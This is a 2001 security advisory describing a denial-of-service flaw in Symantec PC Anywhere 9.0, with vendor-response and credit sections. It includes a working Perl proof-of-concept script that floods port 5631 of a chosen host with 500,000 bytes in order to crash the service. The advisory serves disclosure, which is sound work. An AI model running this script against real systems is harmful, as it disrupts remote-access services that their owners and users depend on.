Reported February 11, 2001 by Securax.
VERSIONS AFFECTED
DESCRIPTION
A Denial of Service (DoS) vulnerability has been discovered
in Symantec PC Anywhere 9.0. By sending anywhere between 320KB to 500KB
of data to one of the two listening ports (5631 and 65301), a malicious user
can cause PCAnywhere to crash. Currently, the vulnerability is a simple
DoS risk, but the attack might be developed into an exploitable overflow.
DEMONSTRATION
The
following proof of concept code was supplied by Securax.
<--bof-->
#!/usr/bin/perl
# Symantec PcAnywhere
9.0 Denial of Service
# -----------------------------------------
# by incubus <incubus@securax.net>
# http://www.hexyn.be
#
# http://www.securax.net
# All my love to Tessa.
# Greetz to: f0bic, r00tdude, t0micron, senti, vorlon,
cicero,
# Zym0tic, segfault, #securax@irc.hexyn.be
# Thanks to jurgen swennen, for letting me (ab)use his
computer.
#
# this is intended as proof of concept, do not abuse!
use IO::Socket;
$host = "$ARGV[0]";
$port = 5631;
if ($#ARGV<0) {
print "use it like: $0 <hostname>\n";
exit();
}
$socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>$port) || die "damn, ";
print "hello\n";
$buf = "";
for($counter = 0; $counter < 500000; $counter++) {
$buf .=
"\x61";
}
print $socket "$buf\n";
close($socket);
exit();
<--eof-->
VENDOR RESPONSE
Unfortunately, Securax released
its advisory to the public in conjunction with contacting the vendor, so
no vendor response is available at this time. A copy of the Securax
advisory is available at:
http://listserv.ntsecurity.net/scripts/wa-ntsecurity.exe?A2=ind0102b&L=win2ksecadvice&F=&S=&P=1025
CREDIT
Discovered by Securax. |
